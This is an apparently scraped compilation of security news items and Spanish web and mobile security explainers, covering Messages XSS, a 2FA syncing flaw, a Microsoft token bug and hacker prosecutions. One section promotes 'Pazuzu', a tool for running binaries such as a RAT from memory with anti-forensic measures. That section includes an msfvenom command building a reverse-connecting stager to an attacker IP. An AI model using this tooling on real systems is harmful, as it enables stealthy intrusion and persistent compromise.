The three researchers that discovered this flaw are Shubham Shah, Joe DeMesy, and Matthew Bryant. They found out that by replacing the http:// protocol at the start of a link with javascript://, the link would execute locally inside the Messages client.
Since the Messages client is a glorified version of the WebKit rendering engine used for displaying content in Safari and all the Chromium-based desktop and mobile browsers, classic XSS (cross-site scripting attacks) could be used.
The three crafted a malicious link that when clicked would jump from the user’s current chat tab to other local tabs, and steal all the content found inside them, uploading it to the attacker’s Web server. Furthermore, the exploit could also scour the local chat archive and exfiltrate all previous messages as well.
Attackers could also steal file attachments such as images
If file attachments such as photos are inside the chat or the archive, those will be stolen as well. If the user had SMS forwarding enabled, the attacker could also recover messages sent to and from the victim’s iPhone.
“Web application security flaws are no longer limited to only the browser but rather have found their way into native applications too,” the three researchers noted. “While it can be productive for developers to use web technologies such as WebKit, […] web application security best practices must still be followed.”
Back in March, security researchers found a way of decrypting images and videos sent in encrypted conversations on older iOS devices. Also last week, security researcher Jose Rodrigues found a flaw in Siri that allowed attackers access to a phone’s photos and contacts list.
Below is a video showcasing how the bug works. Proof-of-concept code is also available on GitHub.
Source:http://news.softpedia.com/
Pazuzu: reflective DLL to run binaries from memory
Most of the times I use Meterpreter in my pentest but sometimes I missed the possibility to run my own binaries from memory to carry out very specific tasks. In this type of scenario I needed a way to run a binary (a simple C application) on the victim host making as little noise as possible (so payloads like download_exe were not an option). To get this I wrote a tiny tool called Pazuzu I would like to share (currently an alpha release with ugly code; no types or macros, etc).
Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory.
To run the payload, you just have to choose the stager you like (reverse TCP, HTTP, HTTPS, etc.) and set the DLL generated by Pazuzu. Pazuzu will execute the binary within the address space of the vulnerable process as long as it has the .reloc section.
The idea is not new, I’ve just put together two techniques (reflective dll injection and some PE injection technique) to get my binary to be run from memory. Why is this useful? This is great in some situations, for example, If you want to run your own RAT (exe) whenever a computer restart you can use a stager to retrieve it and run it from memory, so you don’t need to worry about the persistence mechanism in your binary. Only it is necessary to devote all efforts to make the stager persistent and FUD. So if you have done your own payload in a .exe format and want to run it from memory this could be a good solution. Anoter option, of course, is to recompile your code applying the Stephen Fewer injection technique.
How-to
- The script Pazuzu.py accepts as input the binary you want to run from memory (parameter -f). Depending on the properties of the binary Pazuzu will choose one of the 3 DLL currently available. These DLL are:
- relocx86.dll: lets you run the binary inside the address space of the process. This option is the most favorable since the binary generates less “noise” in the system.
- dforkingx86.dll: the binary in this case also runs from memory but using “process hollowing”. This technique is the one used by the “execute” command with the -m flag in Meterpreter.
- download86.dll: this is the noisiest option since the binary will be downloaded and executed from disk.
- Pazuzu also provides some additional features. For example, the -x option will encrypt the section containing the binary by using a random RC4 key (which is stored in the DLL TimeStamp). In addition, after running it the PE header of the DLL and the binary section will be overwritten with zeros. I will add more anti-forensic techniques in future versions.
- With the -p option the resulting DLL will be patched with the bootstrap required to reach the export “ReflectiveLoader” (more info here). This option is useful to not depend on the Metasploit handler to inject the DLL. That is, if the DLL is already patched we can upload it to a Web server so that the stager could retrieve it from there (more anonymity).
Restrictions
- Not all binaries can be run from memory. For example, applications which require .NET CLR (managed code) won’t be run. I will try to implement this in an upcoming version. By now you can download and run .NET application from disk with the -doption (noisy option).
- If .reloc section is not present the script will use a “process hollowing” approach.
- Support for 32-bit for now.
Examples
To get the Pazuzu DLL I will use a WinHTTP stager:
root@kali:~# msfvenom -p windows/dllinject/reverse_winhttp lhost=192.168.1.44 lport=8080 dll=. -f exe -o Winhttp-stager.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 908 bytes
Saved as: Winhttp-stager.exe
Let’s run Pazuzu.py with the regshot.exe binary (.reloc section present):
Let’s run it now with the verbose option to see more detailed information:
In the next example I use putty.exe which has no reloc section. I have chosen the system binary “c:\windows\write.exe” (option -k) to be “hollowed out” and I have encrypted the binary section with RC4 (option -x). The hidden option -m just run msfvenom with a winhttp dllinject stager.
Here the Process Explorer output:
Here I leave a video with some examples:
Two-Factor Authentication (2FA) Broken by New & Simple Attack
App syncing across devices was poorly implemented and leads to attackers sneaking malicious apps on your phones. 2FA, or Two-Factor Authentication, is regarded alongside biometrics as one of the strongest methods of protecting user data online. A new attack devised by two researchers at a university in Amsterdam shows that weak spots exist in this authentication scheme that open users to attack.
The two, Radhesh Krishnan Konoth and Victor van der Even, said they’ve discovered the flaw back in 2014, alerted Google and other online services, and even presented their findings to a series of banks, but to no avail.
As the researchers explained, because they haven’t gone public until now, many have said that the vulnerability was never dangerous enough to warrant the attention. The two think differently.
App syncing between devices is 2FA’s Achilles heel
As they explain, the attack does not leverage a software flaw, but a design issue with 2FA. Because of a concept called “anywhere computing,” which refers to the ability to sync apps and content across devices, 2FA can be defeated if an attacker gains access to a victim’s PC.
From here, design flaws in the 2FA mechanism of various services allows the crooks to use services such iTunes or the Google Play Store to push malicious apps to a user’s phone without triggering the 2FA authentication system or even show an icon on his homescreen.
Of course, the attacker must also pass malware past Google and Apple and have it listed on their stores, but this has recently started to become a common occurrence.
But still, this also requires for attackers to have full access to your PC, either physically, or through malware that is controlling the device, or has stolen your credentials in order for the attackers to use.
App syncing across devices is not a bad idea, just poorly implemented
Nevertheless, the risk still exists, and the researchers claim that services using 2FA should be very wary of implementing app syncing among different devices.
Asked how they see 2FA services fixing this issue, and especially with Google, where this scheme is used, the researchers said that the best decision is to “move the app installation process (where the user is prompted to accept the app’s permissions) to the mobile device instead of handling it in the browser.”
For more details, you can check out the video below, the BAndroid website, and take a look at the researchers’ paper called How Anywhere Computing Just Killed Your Phone-Based Two-Factor Authentication.
Source:http://news.softpedia.com
Las mejores prácticas para pentesting de aplicaciones móviles
Estas son algunas de las mejores prácticas para ayudar a luchar contra los ataques cibernéticos con pruebas de penetración según expertos de análisis de vulnerabilidades informáticas.
Preparación del entorno de pruebas
Las aplicaciones Web se ejecutan en todo tipo de plataformas y navegadores, pero ese no es el caso de las aplicaciones móviles. Por lo tanto, por las pruebas de las aplicaciones un entorno específico debe estar configurado. En el caso de un dispositivo iOS, por ejemplo, será necesario hacer jailbreak al dispositivo, teniendo en cuenta la seguridad impuesto por Apple, lo que no le permitirá observar y analizar o responder al ataque. En el caso de Android, tendríamos que hacer root para tener accesos requeridos según expertos de análisis de vulnerabilidades informáticas.
Configuración de las herramientas
Una vez que el dispositivo esté listo, necesitará algunas herramientas adicionales para ser instaladas para el análisis y la recopilación de información. Estos deben implementarse en el entorno de prueba y el dispositivo. Cydia es la app store de jailbreak iOS, y a través de ella, es posible descargar las herramientas necesarias para las pruebas.
Para el análisis de binarios en Android, podrían usar Android Apktool o una máquina virtual como Android ingeniería inversa es muy recomendable por los expertos de hacking ético.
Preparación de los casos de prueba
En esta fase, la observación de la aplicación en el nivel funcional y el análisis de su comportamiento, incluyendo descifrarlo si la aplicación ha sido ofuscada, es esencial. Según cursos de hacking ético, la extracción de tipo de marcos que han sido utilizados, tomar notas sobre los siguientes, ayudará a crear un buen modelado de amenazas, aplicando los mismos principios para crear una suite de prueba como se explica en la guía de pruebas de OWASP:
- Identidad, autenticación y control de acceso como llaveros, los ataques de fuerza bruta, los parámetros templados.
- Validación de entrada y codificación.
- Cifrar los campos de contraseña de base de datos SQLite.
- Administración de usuarios y sesiones como identificadores de sesión, tiempo de bloqueos.
- Error y manejo de excepciones.
- Auditoría de registro y los registros de control de acceso.
El análisis de archivos y binarios
Durante esta fase, el objetivo principal es descubrir las llamadas API inseguras y archivos no protegidos adecuadamente con ayuda de metodologías de análisis de vulnerabilidades informáticas. Esto se puede lograr mediante la depuración y el análisis del código usando herramientas como IDA Pro. Desbordamientos de búfer no debe ser descartado. Para descubrir vulnerabilidades, como inyecciones SQL, puede utilizar técnicas como fuzzing la aplicación o la aplicación de insumos maliciosos según expertos de análisis de vulnerabilidades informáticas. Las técnicas utilizadas para descubrir vulnerabilidades en una aplicación nativa son similares a las pruebas de penetración de aplicaciones web con esta diferencia que en lugar de utilizar un proxy para entender el funcionamiento interno de la aplicación, se utiliza el software de depuración.
Seguridad de la arquitectura cliente-servidor
Cuando la aplicación móvil ha sido diseñada con una arquitectura cliente-servidor, ataques de red son una de las principales preocupaciones según experiencia de profesionales de hacking ético. El uso de rastreadores para capturar el tráfico de red e investigar protección de la capa de transporte es esencial. Otras pruebas que se deben incluir en esta fase son:
Autenticación : Observando la solicitud y respuestas entre el cliente y el servidor, es posible descubrir vulnerabilidades que implican la autenticación. En los casos donde la aplicación está utilizando autenticación básica de HTTP, esto representa un riesgo.
Autorización: Las funciones y los controles de acceso entre ellos pueden ser descubiertos a través de manipulación de parámetro. Asegurar la clave de API correctamente en una carpeta inaccesible puede ser descubierto por el análisis de archivos o por spidering .
Administración de sesiones: Fichas de identificación de sesión enviados a través de métodos GET y colocados en la URL son visibles por proxy o por intercepción del tráfico.
Encriptación y protocolos débiles: Las aplicaciones móviles son más vulnerables en estas áreas.
Seguridad del servidor de aplicación
Probar la infraestructura, específicamente el servidor que aloja móvil app, requiere herramientas como nmap y la armadura de pruebas de intrusión diseñada para asignar y descubrir posibles vulnerabilidades y amenazas potenciales. También, cargados de archivos sin restricciones, redirección abierta, y la distribución de los recursos deberían incluirse como parte de las pruebas.
Los desarrolladores móviles también deben ser conscientes de estas técnicas para construir aplicaciones más seguras. Las empresas deben centrarse en la creación de conciencia sobre los riesgos de las aplicaciones móviles vulnerables.
This website will hack Tinder dating App for a price
This website will ‘hack’ Tinder for you to expose cheating partners – for a price.
Do you suspect your partner is cheating on you by using Tinder dating App. A new website is offering to find out if a suspected partner is using Tinder to find love elsewhere .
For $4.99, Swipe Buster will track down a user for you by simply inputting their name and last known location. The website, called Swipebuster claims that it can track down a Tinder user and even expose the user’s last-known location.
Rather than “hacking” Tinder, it uses the app’s API (application program interface) to comb through its database and find the target. The API is intended for developers who want to build plug-in tools for Tinder. Tinder’s A.P.I. and database are public.
The man behind Swipe Buster,who according to Vanity Fair wishes to remain anonymous, told the magazine that Swipe Buster is a short-term project designed to make Tinder aware of how much information it is publicly disclosing about its users.
“There is too much data about people that people themselves don’t know is available,” the founder of the site explained to Vanity Fair .
“Not only are people oversharing and putting out a lot of information about themselves, but companies are also not doing enough to let people know they’re doing it,” he said – electing to remain anonymous.
Source:http://www.techworm.net/
Microsoft patches severe account hijacking security flaw
A vulnerability exposing user accounts to hijacking was patched 48 hours after being reported.
Microsoft has taken only 48 hours to patch a critical account authentication flaw which allowed attackers to use harvested login tokens.
According to British security researcher Jack Whitton, the vulnerability could be exploited through phishing websites designed to harvest login tokens to later compromise user accounts and data.
In a blog post on Monday, the researcher said manipulating POST values could be used in attacks which impersonate users of Microsoft products.
The Redmond giant supports a number of online services, ranging from Outlook email to Azure. When users wish to access these services, they need to input their credentials and a POST request is sent through the ‘wreply‘ value in the domain’s address, complete with a login token for the user in question. The token is then used and consumed through the login process.
Cookies are not used to authenticate as each service is hosted on a separate domain. Therefore, only a token is required — and if this value can be punted to an attacker’s server, the user can be impersonated and the token used to log in as the victim in a cross-site forgery attack.
The researcher found that by tweaking URL-coding parameters and parsing URLs, he was able to bypass different filters which are meant to prevent authentication errors.
This root cause of the bug allows attackers to specify an arbitrary URL to POST authentication tokens, and so if an attacker has gained this data through a fake website or phishing, they can gain complete access to a user account.
While the token is only valid for the service which issued it, such as Outlook rather than Azure and vice versa, the researcher says it would be a simple matter to create multiple hidden iframes with login URLs set to different services in order to harvest multiple tokens.
Whitton reported the security issue to Microsoft on Sunday 24. By the end of the day, Microsoft’s security team had acknowledged the flaw and were able to issue a fix on Tuesday 26.
“This was quite a fun CSRF to find and exploit,” Whitton said. “Despite CSRF bugs not having the same credibility as other bugs, when discovered in authentication systems their impact can be pretty large.”
Source:http://www.zdnet.com/
Romanian Hacker “Guccifer” Appears in U.S. Court
Marcel Lazar Lehel, the 44-year-old Romanian national accused of hacking into the online accounts of many public figures, has been extradited to the United States where he made his first court appearance last week.
Romania’s High Court of Cassation and Justice agreed to extradite Lehel, known online as Guccifer, to the United States for a period of 18 months. U.S. authorities said the man hacked into the email and social media accounts of two former presidents, a former cabinet member, a former presidential advisor, and a former member of the Joint Chiefs of Staff between December 2012 and January 2014. The indictment does not name any of the victims and refers to them as “victim” 1 through 5.
The hacker has been accused of releasing private emails, personal photographs, and medical and financial information belonging to his victims.
Lehel has been charged in the United States with three counts of wire fraud, three counts of gaining unauthorized access to a protected computer, cyber stalking, aggravated identity theft, and obstruction of justice. The U.S. Attorney’s Office in the Eastern District of Virginia said the man faces up to 20 years in prison, with a two-year mandatory minimum for the identity theft charges.
In an interview last year with a Romanian journalist, Lehel said that if he is extradited to the United States, he will “plead guilty, no problem.”
During the time he was active, Guccifer also hacked into the accounts of various actors, journalists and businessmen, but the charges filed by U.S. authorities appear to focus on the attacks targeting officials.
Lehel was arrested by Romanian authorities in January 2014 after hacking into the email accounts of Romanian politician Corina Cretu and George Maior, the head of the Romanian Intelligence Service (SRI). He was sentenced by a Romanian court to seven years in prison for these attacks.
The hacker had been known by Romanian law enforcement as “Little Fume.” He had previously received a three-year suspended sentence for hacking into the accounts of many Romanian celebrities.
‘Anonymous’ hackers cyber-attack Angolan government
The hacking collective Anonymous says it has shut down more than 20 Angolan government websites in response to the jailing of 17 youth activists.
Many of the sites were still down 20 hours after the Portuguese branch of the group claimed the cyber-attack in a post on its Facebook page.
Prominent rapper Luaty Beirao and 16 others were convicted on Monday of planning a rebellion against Angolan President Jose Eduardo dos Santos.
Mr Dos Santos has ruled since 1979.
The activists say they are peaceful campaigners and have called on the veteran leader to step down.
They were arrested in June after discussing a book about non-violent resistance at their book club.
Beirao, also known by his stage name Ikonoklasta, has been an outspoken critic of the government, calling for a fairer distribution of the former Portuguese colony’s oil wealth.
Critics accuse Mr dos Santos of being authoritarian and his government of committing human rights abuses.
The southern African state is rich in diamonds, which fuelled a 27-year civil war in the country.
Source:http://www.bbc.com/
¿CUÁLES SON LOS RIESGOS Y ATAQUES DE SEGURIDAD EN APLICACIONES WEB?
Los sitios web y aplicaciones web son sistemas empresariales de misión crítica que deben funcionar sin problemas de seguridad para procesar datos confidenciales empresariales. Por los motivos de las normas de protección de datos personales, empresas deben considerar seguridad para aplicaciones web. Existen evidencias estadísticas avaladas por empresas de seguridad de aplicaciones cual señalan que en los países como México, Brasil, Estados Unidos, Colombia, Costa Rica, Argentina, UAE, India; dos de cada tres empresas enfrentan riesgos y problemas de seguridad para aplicaciones web o seguridad en páginas web.
Consultores de auditoría de sitio web, clasifican los riesgos por el tipo de ataque. Usando el tipo de ataque como base es el método normalmente usado por empresas de seguridad de aplicaciones. La clasificación de riesgos de seguridad web es de excepcional valor para los desarrolladores de aplicaciones, ejecutivos de la empresa, profesionales de la seguridad o cualquier otro interesado en la auditoría de sitio web. Profesionales de TI normalmente aprenden sobre riesgos informáticos, ataques a nivel aplicación, auditoría de sitio web, seguridad web con ayuda de los cursos de seguridad web. En los países como México, Brasil, Estados Unidos, Colombia, Costa Rica, Argentina, UAE, India etc hay varias empresas de seguridad de aplicaciones que proporcionan capacitaciones y cursos de seguridad web. Pero profesionales de las empresas deben tomar el curso de seguridad web que le enseña metodologías de revisión de seguridad independientes, guías de programación segura, normas internacionales, pruebas de seguridad web, metodologías de explotación, y ataques a nivel aplicación.
A continuación son algunos de ataques que afectan la seguridad de aplicaciones web:
FUERZA BRUTA
Fuerza bruta es un ataque automatizado de prueba y error, utilizado para adivinar los valores (usuarios, contraseña etc.) de los parámetros de la aplicación/pagina web. Normalmente gente usan contraseñas o claves criptográficas débiles que son fáciles de adivinar. Los hackers explotan esta vulnerabilidad de seguridad en páginas web usando un diccionario. Los hackers empiezan un bucle recorriendo el diccionario término a término, en búsqueda de la contraseña válida. Según los expertos de servicios de seguridad en aplicaciones web, el ataque de fuerza bruta es muy popular y pueden llevar a cabo horas, semanas o años en completarse. Con auditoría de sitio web empresas pueden detectar fácilmente las vulnerabilidades relacionadas a fuerza bruta.
AUTENTICACIÓN INCOMPLETA Y DÉBIL VALIDACIÓN
Autenticación incompleta es un ataque cuando un hacker accede alguna funcionalidad sensible de la aplicación sin tener que autenticarse completamente. En este ataque un hacker podría descubrir URL específica de la funcionalidad sensible través de pruebas de fuerza bruta sobre ubicaciones comunes de ficheros y directorios (/admin), mensajes de error etc. Normalmente muchas aplicaciones, páginas web no tienen seguridad y usan las técnicas de seguridad para aplicaciones convencionales. En un ataque de validación débil el atacante pueda obtener, modificar o recuperar los datos, contraseñas de otros usuarios. Esto ocurre cuando los datos requeridos para validar la identidad de los usuarios, son fácilmente predecible o puedan ser falsificadas. Acuerdo con los consultores de empresas de seguridad de aplicaciones, el proceso de validación de datos es una parte importante de las aplicaciones y las empresas deben implementar soluciones de seguridad para aplicaciones. Además con la auditoría de sitio web empresas pueden detectar fácilmente las vulnerabilidades relacionadas a autenticación incompleta y débil validación.
AUTORIZACIÓN INSUFICIENTE
Autorización insuficiente significa que un usuario tiene acceso a los partes sensibles de la aplicación/ sitio web que deberían requerir un aumento de restricciones de control de acceso. Sin algunas medidas de seguridad para aplicaciones, el ataque de autorización insuficiente podría ser muy dañoso. En el ataque de autorización insuficiente, un usuario autenticado podría controlar todo la aplicación o contenido de la página web. Recomendaciones del curso de seguridad webdicen que las aplicaciones deben tener políticas de acceso, modificación y prudentes restricciones deben guiar la actividad de los usuarios dentro de la aplicación.
SECUESTRO DE SESIÓN
En el ataque de secuestro de sesión un hacker podría deducir o adivinar el valor de sesión id y después puede utilizar ese valor para secuestrar la sesión de otro usuario. Si un hacker es capaz de adivinar la ID de sesión de otro usuario, la actividad fraudulenta es posible. Esto podría permitir a un hacker usar el botón atrás del navegador para acceder las páginas accedidas anteriormente por la víctima. Muchas empresas sin seguridad en páginas web son susceptibles a este ataque. Por esta razón es muy importante tener seguridad para aplicaciones.
Otro problema por seguridad para aplicaciones es la expiración de sesión incompleta, según consultores de empresas de seguridad de aplicaciones. Esto se resulte cuando una página web permite reutilización de credenciales de sesión antigua. La expiración de sesión incompleta incrementa la exposición de las páginas web para que los hackers roben o se secuestren sesión.
La fijación de sesión es otra técnica utilizada por secuestro de sesión, según consultores de empresas de seguridad de aplicaciones. Cuando fuerza un ID de sesión de usuario a un valor explícito, el hacker puede explotar esto para secuestrar la sesión. Posteriormente de que un ID de sesión de usuario ha sido fijado, el hacker esperará para usarlo. Cuando el usuario lo hace, el hacker usa el valor del ID de sesión fijado para secuestro de sesión. Las páginas web que usan las sesiones basadas en cookies sin ningún tipo de seguridad en páginas web, son las más fáciles de atacar. Normalmente la mayoría de ataques de secuestro de sesión tiene la fijación de cookie como motivo.
Sin servicios de seguridad en aplicaciones web contra la fijación de sesión, el hacker puede hacer mucho daño y robar datos confidenciales. Según recomendaciones del curso de seguridad web, el lógico para generar sesión ID, cookie y cada sesión ID deben ser mantenidos confidenciales. Empresas pueden aprender fácilmente durante el curso de seguridad web, mejores prácticas por prevenir secuestro de sesión y hacer programación segura de las aplicaciones.
CROSS-SITE SCRIPTING
Cuando un usuario visita una página web, el usuario espera que haber seguridad en página web y la página web le entregue contenido válido. Cross-site Scripting (XSS) es un ataque donde la víctima es el usuario. En el ataque de XSS, el hacker fuerza una página web a ejecutar un código suministrado en el navegador del usuario. Con este código el hacker tiene la habilidad de leer, modificar y transmitir datos sensibles accesibles por el navegador. Sin ningún tipo de seguridad en páginas web, un hacker podría robar cookie, secuestrar sesiones, abrir páginas de phishing, bajar malware y mucho más utilizando el ataque de XSS. Según expertos de servicios de seguridad en aplicaciones web, hay dos tipos de ataques XSS, persistentes y no persistentes. Ambos ataques pueden causar mucho daño a la reputación de la página web. Con ayuda de soluciones como auditoría de sitio web o cursos de seguridad web, empresas pueden entender, detectar y resolver fácilmente las vulnerabilidades relacionadas a cross-site scripting (XSS).
DESBORDAMIENTO DE BUFFER
El desbordamiento de buffer es una vulnerabilidad común en muchos programas, que resulta cuando los datos escritos en la memoria exceden el tamaño reservado en el buffer. Los expertos de empresas de seguridad de aplicaciones, mencionan que durante un ataque de desbordamiento de buffer el atacante explota la vulnerabilidad para alterar el flujo de una aplicación y redirigir el programa para ejecutar código malicioso. Acuerdo con los profesores de cursos de seguridad web esta vulnerabilidad es muy común a nivel a sistema operativo del servidor de la aplicación y empresas pueden detectar durante la auditoría de sitio web y servidor web.
INYECCIÓN DE CÓDIGO SQL
La inyección de código SQL, también conocido como SQL Injection es un ataque muy común y peligroso. Muchas empresas sin seguridad en páginas web son susceptibles a este ataque. Este ataque explota las páginas web que usan SQL como base de datos y construyen sentencias SQL de datos facilitados por el usuario. En el ataque de inyección de código SQL, el hacker puede modificar una sentencia SQL. Con la explotación de la vulnerabilidad, el hacker puede obtener control total sobre la base de datos o también ejecutar comandos en el sistema. Acuerdo con la experiencia de los expertos de servicios de seguridad en aplicaciones web, las empresas pueden prevenir inyección de código SQL con ayuda de saneamiento de los datos facilitados por el usuario. Además empresas pueden detectar y resolver esta vulnerabilidad con la ayuda de auditoría de sitio web.
INDEXACIÓN DE DIRECTORIO
En el ataque de indexación de directorio, un atacante puede acceder todos los ficheros del directorio en el servidor. Sin seguridad en páginas web, esto es equivalente a ejecutar un comando “ls” o “dir”, mostrando los resultados en formato HTML. La información de un directorio podría contener información que no se espera ser vista de forma pública. Además un hacker puede encontrar la información sensible en comentarios HTML, mensajes de error y en código fuente. Acuerdo con la experiencia de consultores de empresa de seguridad de aplicaciones, la indexación de directorio puede permitir una fuga de datos que proporcione a un hacker los datos para lanzar un ataque avanzado.
PATH TRAVERSAL
En el ataque de Path Traversal, un hacker accede los ficheros, directorios y comandos que residen fuera del directorio “root” de la web. Muchos sitios empresariales sin seguridad en páginas web son susceptibles a este ataque. Con acceso a estos directorios, un atacante puede tener accesos a los ejecutables necesarios para realizar la funcionalidad de la aplicación web e información confidencial de usuarios. En el ataque de path traversal un hacker puede manipular una URL de forma que la página web ejecutará o revelará el contenido de ficheros ubicados en cualquier lugar del servidor web. Con ayuda de soluciones como auditoría de aplicación web o capacitación de seguridad web, empresas pueden entender, detectar y resolver fácilmente las vulnerabilidades relacionadas a Path Traversal.
DENEGACIÓN DE SERVICIO
En un ataque de denegación de servicio (DoS), el motivo es impedir que una página web/ aplicación puede funcionar normalmente y sirva la actividad habitual a los usuarios. Los ataques DoS intentan dilapidar todos los recursos disponibles tales como: CPU, memoria, espacio de disco, ancho de banda etc. Cuando estos recursos lleguen un consumo máximo, la aplicación web pasará a estar inaccesible. Según los expertos de servicios de seguridad en aplicaciones web hay diferentes tipos de ataques DoS, como a nivel red, nivel dispositivo, nivel aplicación y de diferentes fuentes (DDoS). Con ayuda de soluciones como auditoría de aplicación web o capacitación de seguridad web, empresas pueden entender, detectar y resolver fácilmente los riesgos relacionados a denegación de servicio.
Estos son algunos de los ataques cibernéticos sobre aplicaciones web. Los servicios de seguridad en aplicaciones web y los cursos de seguridad web deben permitir identificar, resolver los riesgos asociados a las aplicaciones web de su organización. La metodología de seguridad para páginas web/ aplicaciones web debe ser muy diferente de metodología tradicional de empresas de seguridad de aplicaciones. La metodología de seguridad para páginas web/ aplicaciones web debe estar basada en un proceso de pruebas manual y automatizadas por medio de scripts propias, revisión de códigos, herramientas propietarias, comerciales y de código abierto que identifica todos los tipos de vulnerabilidades.
Cyber Security 